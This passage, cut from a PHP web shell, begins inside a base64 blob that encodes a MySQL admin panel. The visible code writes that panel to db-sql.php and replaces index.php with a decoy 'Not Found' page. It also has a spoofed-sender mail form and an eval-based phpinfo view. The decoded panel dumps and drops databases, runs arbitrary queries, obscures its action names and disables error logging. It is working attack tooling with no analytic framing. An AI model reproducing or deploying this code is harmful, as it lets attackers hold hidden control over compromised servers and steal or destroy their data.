kbmFtZT4kdmFsdWU8L3RleHRhcmVhPlxuIjsNCgkJCX0NCgkJfQ0KCQllY2hvICI8L3RyPiI7DQoJfQ0KCWVjaG8gIjwvdGFibGU+PHA+XG4iOw0KCWlmKCAkY21kID09ICJhZGQiICkNCgkJZWNobyAiPGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPSdBZGQgRGF0YSc+XG4iOw0KCWVsc2UgaWYoICRjbWQgPT0gImVkaXQiICkNCgkJZWNobyAiPGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPSdFZGl0IERhdGEnPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1idXR0b24gdmFsdWU9J0NhbmNlbCcgb25DbGljaz0naGlzdG9yeS5iYWNrKCknPlxuIjsNCgllY2hvICI8L2Zvcm0+XG4iOw0KfQ0KDQpmdW5jdGlvbiBtYW5hZ2VEYXRhX3N1Ym1pdCggJGNtZCApIHsNCglnbG9iYWwgJG15c3FsSGFuZGxlLCAkZGJuYW1lLCAkdGFibGVuYW1lLCAkZmllbGRuYW1lLCAkUEhQX1NFTEYsICRxdWVyeVN0ciwgJGVyck1zZzsNCgkkcFJlc3VsdCA9IG15c3FsX2xpc3RfZmllbGRzKCAkZGJuYW1lLCAkdGFibGVuYW1lICk7DQoJJG51bSA9IG15c3FsX251bV9maWVsZHMoICRwUmVzdWx0ICk7DQoJbXlzcWxfc2VsZWN0X2RiKCAkZGJuYW1lLCAkbXlzcWxIYW5kbGUgKTsNCglpZiggJGNtZCA9PSAiYWRkIiApDQoJCSRxdWVyeVN0ciA9ICJJTlNFUlQgSU5UTyAkdGFibGVuYW1lIFZBTFVFUyAoIjsNCgllbHNlIGlmKCAkY21kID09ICJlZGl0IiApDQoJCSRxdWVyeVN0ciA9ICJSRVBMQUNFIElOVE8gJHRhYmxlbmFtZSBWQUxVRVMgKCI7DQoJZm9yKCAkaSA9IDA7ICRpIDwgJG51bS0xOyAkaSsrICkgew0KCQkkZmllbGQgPSBteXNxbF9mZXRjaF9maWVsZCggJHBSZXN1bHQgKTsNCgkJJGZ1bmMgPSAkR0xPQkFMU1skZmllbGQtPm5hbWUuIl9mdW5jdGlvbiJdOw0KCQlpZiggJGZ1bmMgIT0gIiIgKQ0KCQkJJHF1ZXJ5U3RyIC49ICIgJGZ1bmMoIjsNCgkJaWYoICRmaWVsZC0+bnVtZXJpYyA9PSAxICkgew0KCQkJJHF1ZXJ5U3RyIC49ICRHTE9CQUxTWyRmaWVsZC0+bmFtZV07DQoJCQlpZiggJGZ1bmMgIT0gIiIgKQ0KCQkJCSRxdWVyeVN0ciAuPSAiKSwiOw0KCQkJZWxzZQ0KCQkJCSRxdWVyeVN0ciAuPSAiLCI7DQoJCX0gZWxzZSB7DQoJCQkkcXVlcnlTdHIgLj0gIiciIC4gJEdMT0JBTFNbJGZpZWxkLT5uYW1lXTsNCgkJCWlmKCAkZnVuYyAhPSAiIiApDQoJCQkJJHF1ZXJ5U3RyIC49ICInKSwiOw0KCQkJZWxzZQ0KCQkJCSRxdWVyeVN0ciAuPSAiJywiOw0KCQl9DQoJfQ0KCSRmaWVsZCA9IG15c3FsX2ZldGNoX2ZpZWxkKCAkcFJlc3VsdCApOw0KCWlmKCAkZmllbGQtPm51bWVyaWMgPT0gMSApDQoJCSRxdWVyeVN0ciAuPSAkR0xPQkFMU1skZmllbGQtPm5hbWVdIC4gIikiOw0KCWVsc2UNCgkJJHF1ZXJ5U3RyIC49ICInIiAuICRHTE9CQUxTWyRmaWVsZC0+bmFtZV0gLiAiJykiOw0KCW15c3FsX3F1ZXJ5KCAkcXVlcnlTdHIgLCAkbXlzcWxIYW5kbGUgKTsNCgkkZXJyTXNnID0gbXlzcWxfZXJyb3IoKTsNCgl2aWV3RGF0YSggIiIgKTsNCn0NCg0KZnVuY3Rpb24gZGVsZXRlRGF0YSgpIHsNCglnbG9iYWwgJG15c3FsSGFuZGxlLCAkZGJuYW1lLCAkdGFibGVuYW1lLCAkZmllbGRuYW1lLCAkUEhQX1NFTEYsICRxdWVyeVN0ciwgJGVyck1zZzsNCgkkcFJlc3VsdCA9IG15c3FsX2xpc3RfZmllbGRzKCAkZGJuYW1lLCAkdGFibGVuYW1lICk7DQoJJG51bSA9IG15c3FsX251bV9maWVsZHMoICRwUmVzdWx0ICk7DQoJJGtleSA9ICIiOw0KCWZvciggJGkgPSAwOyAkaSA8ICRudW07ICRpKysgKSB7DQoJCSRmaWVsZCA9IG15c3FsX2ZldGNoX2ZpZWxkKCAkcFJlc3VsdCwgJGkgKTsNCgkJaWYoICRmaWVsZC0+cHJpbWFyeV9rZXkgPT0gMSApDQoJCQlpZiggJGZpZWxkLT5udW1lcmljID09IDEgKQ0KCQkJCSRrZXkgLj0gJGZpZWxkLT5uYW1lIC4gIj0iIC4gJEdMT0JBTFNbJGZpZWxkLT5uYW1lXSAuICIgQU5EICI7DQoJCQllbHNlDQoJCQkJJGtleSAuPSAkZmllbGQtPm5hbWUgLiAiPSciIC4gJEdMT0JBTFNbJGZpZWxkLT5uYW1lXSAuICInIEFORCAiOw0KCX0NCgkka2V5ID0gc3Vic3RyKCAka2V5LCAwLCBzdHJsZW4oJGtleSktNCApOw0KCW15c3FsX3NlbGVjdF9kYiggJGRibmFtZSwgJG15c3FsSGFuZGxlICk7DQoJJHF1ZXJ5U3RyID0gICJERUxFVEUgRlJPTSAkdGFibGVuYW1lIFdIRVJFICRrZXkiOw0KCW15c3FsX3F1ZXJ5KCAkcXVlcnlTdHIsICRteXNxbEhhbmRsZSApOw0KCSRlcnJNc2cgPSBteXNxbF9lcnJvcigpOw0KCXZpZXdEYXRhKCAiIiApOw0KfQ0KDQpmdW5jdGlvbiBmZXRjaF90YWJsZV9kdW1wX3NxbCgkdGFibGUpDQp7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwkZGJuYW1lOw0KCW15c3FsX3NlbGVjdF9kYiggJGRibmFtZSwgJG15c3FsSGFuZGxlICk7DQoJJHF1ZXJ5X2lkID0gbXlzcWxfcXVlcnkoIlNIT1cgQ1JFQVRFIFRBQkxFICR0YWJsZSIsJG15c3FsSGFuZGxlKTsNCgkkdGFibGVkdW1wID0gbXlzcWxfZmV0Y2hfYXJyYXkoJHF1ZXJ5X2lkLCBNWVNRTF9BU1NPQyk7DQoJJHRhYmxlZHVtcCA9ICJEUk9QIFRBQkxFIElGIEVYSVNUUyAkdGFibGU7XG4iIC4gJHRhYmxlZHVtcFsnQ3JlYXRlIFRhYmxlJ10gLiAiO1xuXG4iOw0KCWVjaG8gJHRhYmxlZHVtcDsNCgkvLyBnZXQgZGF0YQ0KCSRyb3dzID0gbXlzcWxfcXVlcnkoIlNFTEVDVCAqIEZST00gJHRhYmxlIiwkbXlzcWxIYW5kbGUpOw0KCSRudW1maWVsZHM9bXlzcWxfbnVtX2ZpZWxkcygkcm93cyk7DQoJd2hpbGUgKCRyb3cgPSBteXNxbF9mZXRjaF9hcnJheSgkcm93cywgTVlTUUxfTlVNKSkNCgl7DQoJCSR0YWJsZWR1bXAgPSAiSU5TRVJUIElOVE8gJHRhYmxlIFZBTFVFUygiOw0KCQkkZmllbGRjb3VudGVyID0gLTE7DQoJCSRmaXJzdGZpZWxkID0gMTsNCgkJLy8gZ2V0IGVhY2ggZmllbGQncyBkYXRhDQoJCXdoaWxlICgrKyRmaWVsZGNvdW50ZXIgPCAkbnVtZmllbGRzKQ0KCQl7DQoJCQlpZiAoISRmaXJzdGZpZWxkKQ0KCQkJew0KCQkJCSR0YWJsZWR1bXAgLj0gJywgJzsNCgkJCX0NCgkJCWVsc2UNCgkJCXsNCgkJCQkkZmlyc3RmaWVsZCA9IDA7DQoJCQl9DQoJCQlpZiAoIWlzc2V0KCRyb3dbIiRmaWVsZGNvdW50ZXIiXSkpDQoJCQl7DQoJCQkJJHRhYmxlZHVtcCAuPSAnTlVMTCc7DQoJCQl9DQoJCQllbHNlDQoJCQl7DQoJCQkJJHRhYmxlZHVtcCAuPSAiJyIgLiBteXNxbF9lc2NhcGVfc3RyaW5nKCRyb3dbIiRmaWVsZGNvdW50ZXIiXSkgLiAiJyI7DQoJCQl9DQoJCX0NCgkJJHRhYmxlZHVtcCAuPSAiKTtcbiI7DQoJCWVjaG8gJHRhYmxlZHVtcDsNCgl9DQoJQG15c3FsX2ZyZWVfcmVzdWx0KCRyb3dzKTsNCn0NCg0KZnVuY3Rpb24gZHVtcCgpIHsNCglnbG9iYWwgJG15c3FsSGFuZGxlLCAkYWN0aW9uLCAkZGJuYW1lLCAkdGFibGVuYW1lOw0KCWlmKCAkYWN0aW9uID09ICJkdW1wVGFibGUiICl7DQoJCWhlYWRlcigiQ29udGVudC1kaXNwb3NpdGlvbjogZmlsZW5hbWU9JHRhYmxlbmFtZS5zcWwiKTsNCgkJaGVhZGVyKCdDb250ZW50LXR5cGU6IHVua25vd24vdW5rbm93bicpOw0KCQlmZXRjaF90YWJsZV9kdW1wX3NxbCgkdGFibGVuYW1lKTsNCgkJZWNobyAiXG5cblxuIjsNCgkJZWNobyAiXHJcblxyXG5cclxuIyMjICR0YWJsZW5hbWUgVEFCTEUgRFVNUCBDT01QTEVURUQgIyMjIjsNCgkJZXhpdDsNCgl9ZWxzZXsNCgkJaGVhZGVyKCJDb250ZW50LWRpc3Bvc2l0aW9uOiBmaWxlbmFtZT0kZGJuYW1lLnNxbCIpOw0KCQloZWFkZXIoJ0NvbnRlbnQtdHlwZTogdW5rbm93bi91bmtub3duJyk7DQoJCW15c3FsX3NlbGVjdF9kYiggJGRibmFtZSwgJG15c3FsSGFuZGxlICk7DQoJCSRxdWVyeV9pZCA9IG15c3FsX3F1ZXJ5KCJTSE9XIHRhYmxlcyIsJG15c3FsSGFuZGxlKTsNCgkJd2hpbGUgKCRyb3cgPSBteXNxbF9mZXRjaF9hcnJheSgkcXVlcnlfaWQsIE1ZU1FMX05VTSkpDQoJCXsNCgkJCQlmZXRjaF90YWJsZV9kdW1wX3NxbCgkcm93WzBdKTsNCgkJCQllY2hvICJcblxuXG4iOw0KCQkJCWVjaG8gIlxyXG5cclxuXHJcbiMjIyAkcm93WzBdIFRBQkxFIERVTVAgQ09NUExFVEVEICMjIyI7DQoJCQkJZWNobyAiXG5cblxuIjsNCgkJfQ0KCQllY2hvICJcclxuXHJcblxyXG4jIyMgJGRibmFtZSBEQVRBQkFTRSBEVU1QIENPTVBMRVRFRCAjIyMiOw0KCQlleGl0Ow0KCX0NCn0NCg0KZnVuY3Rpb24gdXRpbHMoKSB7DQoJZ2xvYmFsICRQSFBfU0VMRiwgJGNvbW1hbmQ7DQoJZWNobyAiPGgxPlV0aWxpdGllczwvaDE+XG4iOw0KCWlmKCAkY29tbWFuZCA9PSAiIiB8fCBzdWJzdHIoICRjb21tYW5kLCAwLCA1ICkgPT0gImZsdXNoIiApIHsNCgkJZWNobyAiPGhyPlxuIjsNCgkJZWNobyAiU2hvd1xuIjsNCgkJZWNobyAiPHVsPlxuIjsNCgkJZWNobyAiPGxpPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dXRpbHMmY29tbWFuZD1zaG93X3N0YXR1cyc+U3RhdHVzPC9hPlxuIjsNCgkJZWNobyAiPGxpPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dXRpbHMmY29tbWFuZD1zaG93X3ZhcmlhYmxlcyc+VmFyaWFibGVzPC9hPlxuIjsNCgkJZWNobyAiPGxpPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dXRpbHMmY29tbWFuZD1zaG93X3Byb2Nlc3NsaXN0Jz5Qcm9jZXNzbGlzdDwvYT5cbiI7DQoJCWVjaG8gIjwvdWw+XG4iOw0KCQllY2hvICJGbHVzaFxuIjsNCgkJZWNobyAiPHVsPlxuIjsNCgkJZWNobyAiPGxpPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dXRpbHMmY29tbWFuZD1mbHVzaF9ob3N0cyc+SG9zdHM8L2E+XG4iOw0KCQlpZiggJGNvbW1hbmQgPT0gImZsdXNoX2hvc3RzIiApIHsNCgkJCWlmKCBteXNxbF9xdWVyeSggIkZsdXNoIGhvc3RzIiApICE9IGZhbHNlICkNCgkJCQllY2hvICItIFN1Y2Nlc3MiOw0KCQkJZWxzZQ0KCQkJCWVjaG8gIi0gRmFpbCI7DQoJCX0NCgkJZWNobyAiPGxpPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dXRpbHMmY29tbWFuZD1mbHVzaF9sb2dzJz5Mb2dzPC9hPlxuIjsNCgkJaWYoICRjb21tYW5kID09ICJmbHVzaF9sb2dzIiApIHsNCgkJCWlmKCBteXNxbF9xdWVyeSggIkZsdXNoIGxvZ3MiICkgIT0gZmFsc2UgKQ0KCQkJCWVjaG8gIi0gU3VjY2VzcyI7DQoJCQllbHNlDQoJCQkJZWNobyAiLSBGYWlsIjsNCgkJfQ0KCQllY2hvICI8bGk+PGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj11dGlscyZjb21tYW5kPWZsdXNoX3ByaXZpbGVnZXMnPlByaXZpbGVnZXM8L2E+XG4iOw0KCQlpZiggJGNvbW1hbmQgPT0gImZsdXNoX3ByaXZpbGVnZXMiICkgew0KCQkJaWYoIG15c3FsX3F1ZXJ5KCAiRmx1c2ggcHJpdmlsZWdlcyIgKSAhPSBmYWxzZSApDQoJCQkJZWNobyAiLSBTdWNjZXNzIjsNCgkJCWVsc2UNCgkJCQllY2hvICItIEZhaWwiOw0KCQl9DQoJCWVjaG8gIjxsaT48YSBocmVmPSckUEhQX1NFTEY/YWN0aW9uPXV0aWxzJmNvbW1hbmQ9Zmx1c2hfdGFibGVzJz5UYWJsZXM8L2E+XG4iOw0KCQlpZiggJGNvbW1hbmQgPT0gImZsdXNoX3RhYmxlcyIgKSB7DQoJCQlpZiggbXlzcWxfcXVlcnkoICJGbHVzaCB0YWJsZXMiICkgIT0gZmFsc2UgKQ0KCQkJCWVjaG8gIi0gU3VjY2VzcyI7DQoJCQllbHNlDQoJCQkJZWNobyAiLSBGYWlsIjsNCgkJfQ0KCQllY2hvICI8bGk+PGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj11dGlscyZjb21tYW5kPWZsdXNoX3N0YXR1cyc+U3RhdHVzPC9hPlxuIjsNCgkJaWYoICRjb21tYW5kID09ICJmbHVzaF9zdGF0dXMiICkgew0KCQkJaWYoIG15c3FsX3F1ZXJ5KCAiRmx1c2ggc3RhdHVzIiApICE9IGZhbHNlICkNCgkJCQllY2hvICItIFN1Y2Nlc3MiOw0KCQkJZWxzZQ0KCQkJCWVjaG8gIi0gRmFpbCI7DQoJCX0NCgkJZWNobyAiPC91bD5cbiI7DQoJfSBlbHNlIHsNCgkJJHF1ZXJ5U3RyID0gZXJlZ19yZXBsYWNlKCAiXyIsICIgIiwgJGNvbW1hbmQgKTsNCgkJJHBSZXN1bHQgPSBteXNxbF9xdWVyeSggJHF1ZXJ5U3RyICk7DQoJCWlmKCAkcFJlc3VsdCA9PSBmYWxzZSApIHsNCgkJCWVjaG8gIkZhaWwiOw0KCQkJcmV0dXJuOw0KCQl9DQoJCSRjb2wgPSBteXNxbF9udW1fZmllbGRzKCAkcFJlc3VsdCApOw0KCQllY2hvICI8cCBjbGFzcz1sb2NhdGlvbj4kcXVlcnlTdHI8L3A+XG4iOw0KCQllY2hvICI8aHI+XG4iOw0KCQllY2hvICI8dGFibGUgY2VsbHNwYWNpbmc9MSBjZWxscGFkZGluZz0yIGJvcmRlcj0wPlxuIjsNCgkJZWNobyAiPHRyPlxuIjsNCgkJZm9yKCAkaSA9IDA7ICRpIDwgJGNvbDsgJGkrKyApIHsNCgkJCSRmaWVsZCA9IG15c3FsX2ZldGNoX2ZpZWxkKCAkcFJlc3VsdCwgJGkgKTsNCgkJCWVjaG8gIjx0aD4iLiRmaWVsZC0+bmFtZS4iPC90aD5cbiI7DQoJCX0NCgkJZWNobyAiPC90cj5cbiI7DQoJCXdoaWxlKCAxICkgew0KCQkJJHJvd0FycmF5ID0gbXlzcWxfZmV0Y2hfcm93KCAkcFJlc3VsdCApOw0KCQkJaWYoICRyb3dBcnJheSA9PSBmYWxzZSApIGJyZWFrOw0KCQkJZWNobyAiPHRyPlxuIjsNCgkJCWZvciggJGogPSAwOyAkaiA8ICRjb2w7ICRqKysgKQ0KCQkJCWVjaG8gIjx0ZD4iLmh0bWxzcGVjaWFsY2hhcnMoICRyb3dBcnJheVskal0gKS4iPC90ZD5cbiI7DQoJCQllY2hvICI8L3RyPlxuIjsNCgkJfQ0KCQllY2hvICI8L3RhYmxlPlxuIjsNCgl9DQp9DQpmdW5jdGlvbiBmb290ZXJfaHRtbCgpIHsNCglnbG9iYWwgJG15c3FsSGFuZGxlLCAkZGJuYW1lLCAkdGFibGVuYW1lLCAkUEhQX1NFTEYsICRVU0VSTkFNRTsNCgllY2hvICI8aHI+XG4iOw0KCWVjaG8gIjxzcGFuIGNsYXNzPVwibmV3XCI+WyRVU0VSTkFNRV08L3NwYW4+IC0gXG4iOw0KCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249YkdsemRFUkNjdz09Jz5EYXRhYmFzZSBMaXN0PC9hPiB8IFxuIjsNCglpZiggJHRhYmxlbmFtZSAhPSAiIiApDQoJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249bGlzdFRhYmxlcyZkYm5hbWU9JGRibmFtZSZ0YWJsZW5hbWU9JHRhYmxlbmFtZSc+VGFibGUgTGlzdDwvYT4gfCAiOw0KCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dXRpbHMnPlV0aWxzPC9hPiB8XG4iOw0KCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249bG9nb3V0Jz5Mb2dvdXQ8L2E+XG4iOw0KfQ0KLy8tLS0tLS0tLS0tLS0tIE1BSU4gLS0tLS0tLS0tLS0tLSAvLw0KZXJyb3JfcmVwb3J0aW5nKDApOw0KaW5pX3NldCAoJ2Rpc3BsYXlfZXJyb3JzJywgMCk7DQppbmlfc2V0ICgnbG9nX2Vycm9ycycsIDApOw0KaWYoICRhY3Rpb24gPT0gImxvZ29uIiB8fCAkYWN0aW9uID09ICIiIHx8ICRhY3Rpb24gPT0gImxvZ291dCIgKQ0KCWxvZ29uKCk7DQplbHNlIGlmKCAkYWN0aW9uID09ICJiRzluYjI1ZmMzVmliV2wwIiApDQoJbG9nb25fc3VibWl0KCk7DQplbHNlIGlmKCAkYWN0aW9uID09ICJkdW1wVGFibGUiIHx8ICRhY3Rpb24gPT0gImR1bXBEQiIgKSB7DQoJd2hpbGUoIGxpc3QoJHZhciwgJHZhbHVlKSA9IGVhY2goJEhUVFBfQ09PS0lFX1ZBUlMpICkgew0KCQlpZiggJHZhciA9PSAibXlzcWxfd2ViX2FkbWluX3VzZXJuYW1lIiApICRVU0VSTkFNRSA9ICR2YWx1ZTsNCgkJaWYoICR2YXIgPT0gIm15c3FsX3dlYl9hZG1pbl9wYXNzd29yZCIgKSAkUEFTU1dPUkQgPSAkdmFsdWU7DQoJCWlmKCAkdmFyID09ICJteXNxbF93ZWJfYWRtaW5faG9zdG5hbWUiICkgJEhPU1ROQU1FID0gJHZhbHVlOw0KCX0NCgkkbXlzcWxIYW5kbGUgPSBAbXlzcWxfY29ubmVjdCggJEhPU1ROQU1FLiI6MzMwNiIsICRVU0VSTkFNRSwgJFBBU1NXT1JEICk7DQoJZHVtcCgpOw0KfSBlbHNlIHsNCgl3aGlsZSggbGlzdCgkdmFyLCAkdmFsdWUpID0gZWFjaCgkSFRUUF9DT09LSUVfVkFSUykgKSB7DQoJCWlmKCAkdmFyID09ICJteXNxbF93ZWJfYWRtaW5fdXNlcm5hbWUiICkgJFVTRVJOQU1FID0gJHZhbHVlOw0KCQlpZiggJHZhciA9PSAibXlzcWxfd2ViX2FkbWluX3Bhc3N3b3JkIiApICRQQVNTV09SRCA9ICR2YWx1ZTsNCgkJaWYoICR2YXIgPT0gIm15c3FsX3dlYl9hZG1pbl9ob3N0bmFtZSIgKSAkSE9TVE5BTUUgPSAkdmFsdWU7DQoJfQ0KCWVjaG8gIjwhLS0iOw0KCSRteXNxbEhhbmRsZSA9IEBteXNxbF9jb25uZWN0KCAkSE9TVE5BTUUuIjozMzA2IiwgJFVTRVJOQU1FLCAkUEFTU1dPUkQgKTsNCgllY2hvICItLT4iOw0KCWlmKCAkbXlzcWxIYW5kbGUgPT0gZmFsc2UgKSB7DQoJCWVjaG8gIjx0YWJsZSB3aWR0aD0xMDAlIGhlaWdodD0xMDAlPjx0cj48dGQ+PGNlbnRlcj5cbiI7DQoJCWVjaG8gIjxoMT5Xcm9uZyBQYXNzd29yZCE8L2gxPlxuIjsNCgkJZWNobyAiPGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj1sb2dvbic+TG9nb248L2E+XG4iOw0KCQllY2hvICI8L2NlbnRlcj48L3RkPjwvdHI+PC90YWJsZT5cbiI7DQoJfSBlbHNlIHsNCgkJaWYoICRhY3Rpb24gPT0gImJHbHpkRVJDY3c9PSIgKQ0KCQkJbGlzdERhdGFiYXNlcygpOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJjcmVhdGVEQiIgKQ0KCQkJY3JlYXRlRGF0YWJhc2UoKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiZHJvcERCIiApDQoJCQlkcm9wRGF0YWJhc2UoKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAibGlzdFRhYmxlcyIgKQ0KCQkJbGlzdFRhYmxlcygpOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJjcmVhdGVUYWJsZSIgKQ0KCQkJY3JlYXRlVGFibGUoKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiZHJvcFRhYmxlIiApDQoJCQlkcm9wVGFibGUoKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAidmlld1NjaGVtYSIgKQ0KCQkJdmlld1NjaGVtYSgpOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJxdWVyeSIgKQ0KCQkJdmlld0RhdGEoICRxdWVyeVN0ciApOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJhZGRGaWVsZCIgKQ0KCQkJbWFuYWdlRmllbGQoICJhZGQiICk7DQoJCWVsc2UgaWYoICRhY3Rpb24gPT0gImFkZEZpZWxkX3N1Ym1pdCIgKQ0KCQkJbWFuYWdlRmllbGRfc3VibWl0KCAiYWRkIiApOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJlZGl0RmllbGQiICkNCgkJCW1hbmFnZUZpZWxkKCAiZWRpdCIgKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiZWRpdEZpZWxkX3N1Ym1pdCIgKQ0KCQkJbWFuYWdlRmllbGRfc3VibWl0KCAiZWRpdCIgKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiZHJvcEZpZWxkIiApDQoJCQlkcm9wRmllbGQoKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiZG1sbGQwUmhkR0U9IiApDQoJCQl2aWV3RGF0YSggIiIgKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiYWRkRGF0YSIgKQ0KCQkJbWFuYWdlRGF0YSggImFkZCIgKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiYWRkRGF0YV9zdWJtaXQiICkNCgkJCW1hbmFnZURhdGFfc3VibWl0KCAiYWRkIiApOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJlZGl0RGF0YSIgKQ0KCQkJbWFuYWdlRGF0YSggImVkaXQiICk7DQoJCWVsc2UgaWYoICRhY3Rpb24gPT0gImVkaXREYXRhX3N1Ym1pdCIgKQ0KCQkJbWFuYWdlRGF0YV9zdWJtaXQoICJlZGl0IiApOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJkZWxldGVEYXRhIiApDQoJCQlkZWxldGVEYXRhKCk7DQoJCWVsc2UgaWYoICRhY3Rpb24gPT0gInV0aWxzIiApDQoJCQl1dGlscygpOw0KCQlteXNxbF9jbG9zZSggJG15c3FsSGFuZGxlKTsNCgkJZm9vdGVyX2h0bWwoKTsNCgl9DQp9DQo/Pg0KPGh0bWw+DQo8aGVhZD4NCjx0aXRsZT5NeVNRTCBJbnRlcmZhY2UgKERldmVsb3BlZCBCeSBNb2hhamVyMjIpPC90aXRsZT4NCjxib2R5IGJnQ29sb3I9IzAwMDAwMCA+DQo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPg0KPCEtLQ0KcC5sb2NhdGlvbiB7DQoJY29sb3I6ICMwMEZGMDA7DQp9DQpoMSwgaDIsIGgzIHsNCgljb2xvcjogIzAwRkYwMDsNCn0NCnRoIHsNCgliYWNrZ3JvdW5kLWNvbG9yOiAjMjIyMjIyOw0KCWNvbG9yOiAjMDBGRjAwOw0KCWZvbnQtc2l6ZTogc21hbGw7DQp9DQp0ZCB7DQoJY29sb3I6ICMwMEZGMDA7DQoJYmFja2dyb3VuZC1jb2xvcjogIzQ0NDQ0NDsNCglmb250LXNpemU6IHNtYWxsOw0KfQ0KZm9ybSB7DQoJbWFyZ2luLXRvcDogMDsNCgltYXJnaW4tYm90dG9tOiAwOw0KfQ0KYSB7DQoJdGV4dC1kZWNvcmF0aW9uOm5vbmU7DQoJY29sb3I6ICMwMEZGMDA7DQoJZm9udC1zaXplOnNtYWxsOw0KfQ0KQTpsaW5rIHsNCkNPTE9SOiNGRkZGRkY7DQpURVhULURFQ09SQVRJT046IG5vbmUNCn0NCkE6dmlzaXRlZCB7DQpDT0xPUjojMDBGRjAwOw0KVEVYVC1ERUNPUkFUSU9OOiBub25lDQp9DQpBOmFjdGl2ZSB7DQpDT0xPUjojMDBGRjAwOw0KVEVYVC1ERUNPUkFUSU9OOiBub25lDQp9DQpBOmhvdmVyIHsNCmNvbG9yOiMwMEZGMDA7DQpURVhULURFQ09SQVRJT046IG5vbmUNCn0NCmlucHV0LCBzZWxlY3QsIHRleHRhcmVhIHsNCmJhY2tncm91bmQtY29sb3I6ICMwMDAwMDA7DQpib3JkZXItc3R5bGU6IHNvbGlkOw0KZm9udC1mYW1pbHk6IFRhaG9tYSxWZXJkYW5hLEFyaWFsLFNhbnMtU2VyaWY7DQpmb250LXNpemU6c21hbGw7DQpjb2xvcjogIzAwRkYwMDsNCnBhZGRpbmc6IDBweDsNCn0NCmxpIHsNCmNvbG9yOiAjMDBGRjAwOw0KfQ0KLm5ldyB7DQpjb2xvcjogIzAwRkYwMDsNCn0NCi8vLS0+DQo8L3N0eWxlPg0KPC9oZWFkPg==\'; \r\n$file = fopen("db-sql.php" ,"w+");\r\n$write = fwrite ($file ,base64_decode($sqlshell));\r\nfclose($file);\r\n    chmod("db-sql.php", 0644);\r\n$indexshell = fopen("index.php" ,"w+");\r\n$data = \'PGgxPk5vdCBGb3VuZDwvaDE+IA0KPHA+VGhlIHJlcXVlc3RlZCBVUkwgd2FzIG5vdCBmb3VuZCBvbiB0aGlzIHNlcnZlci48L3A+IA0KPGhyPiANCjxhZGRyZXNzPkFwYWNoZSBTZXJ2ZXIgYXQgPD89JF9TRVJWRVJbJ0hUVFBfSE9TVCddPz4gUG9ydCA4MDwvYWRkcmVzcz4gDQogICAgPHN0eWxlPiANCiAgICAgICAgaW5wdXQgeyBtYXJnaW46MDtiYWNrZ3JvdW5kLWNvbG9yOiNmZmY7Ym9yZGVyOjFweCBzb2xpZCAjZmZmOyB9IA0KICAgIDwvc3R5bGU+\';\r\n$tulis = fwrite( $indexshell, base64_decode($data));\r\nfclose($indexshell);\r\n   echo "<iframe src=mysql/db-sql.php width=97% height=100% frameborder=0></iframe>"; \r\n}\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'mail\')){\r\nif(isset($_POST[\'mail_send\'])){\r\n\t$mail_to = $_POST[\'mail_to\'];\r\n\t$mail_from = $_POST[\'mail_from\'];\r\n\t$mail_subject = $_POST[\'mail_subject\'];\r\n\t$mail_content = magicboom($_POST[\'mail_content\']);\r\n\tif(@mail($mail_to,$mail_subject,$mail_content,"FROM:$mail_from")){\r\n\t\t$msg = "email sent to $mail_to";\r\n\t}\r\n\telse $msg = "send email failed";\r\n}\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=mail" method="post">\r\n<table class="cmdbox">\r\n<tr><td>\r\n<textarea class="output" name="mail_content" id="cmd" style="height:340px;">Hey there, please patch me ASAP ;-p</textarea>\r\n<tr><td>&nbsp;<input class="inputz" style="width:20%;" type="text" value="[email protected]" name="mail_to" />&nbsp; mail to</td></tr>\r\n<tr><td>&nbsp;<input class="inputz" style="width:20%;" type="text" value="[email protected]" name="mail_from" />&nbsp; from</td></tr>\r\n<tr><td>&nbsp;<input class="inputz" style="width:20%;" type="text" value="patch me" name="mail_subject" />&nbsp; subject</td></tr>\r\n<tr><td>&nbsp;<input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="mail_send" /></td></tr></form>\r\n<tr><td>&nbsp;&nbsp;&nbsp;&nbsp;<?php echo $msg; ?></td></tr>\r\n</table>\r\n</form>\r\n\r\n<?php }\r\n\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'phpinfo\')){ \r\n\t@ob_start();\r\n\t@eval("phpinfo();");\r\n\t$buff = @ob_get_contents();\r\n\t@ob_end_clean();\t\r\n\t$awal = strpos($buff,"<body>")+6;\r\n\t$akhir = strpos($buff,"</body>");\r\n\techo "<div 